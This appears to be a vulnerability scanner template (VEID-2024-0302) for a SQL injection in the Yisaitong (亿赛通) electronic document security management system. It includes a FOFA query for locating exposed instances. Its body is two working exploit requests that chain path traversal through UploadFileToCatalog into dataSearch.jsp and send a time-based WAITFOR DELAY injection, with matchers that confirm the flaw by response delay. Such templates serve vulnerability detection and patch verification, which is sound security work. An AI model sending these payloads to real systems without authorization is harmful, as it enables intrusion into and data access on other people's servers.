## id: VEID-2024-0302
## name: 亿赛通电子文档安全管理系统接口dataSearch.jsp存在SQL注入
## author: hack007x
## severity: high
## tags: veid,file,veid2024
## description: 亿赛通电子文档存在SQL注入
## fofa-query: app="亿赛通-电子文档安全管理系统"
## verification: true


POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

id=1';WAITFOR+DELAY+'0:0:5'--

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: status_code == 200

---

POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

id=1';WAITFOR+DELAY+'0:0:8'--

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: status_code == 200


# @VEIL-STAMP: 7f005b8442232763680eccef8ac5f7539e7a991676ad9f8eae1a1e670ab444dd
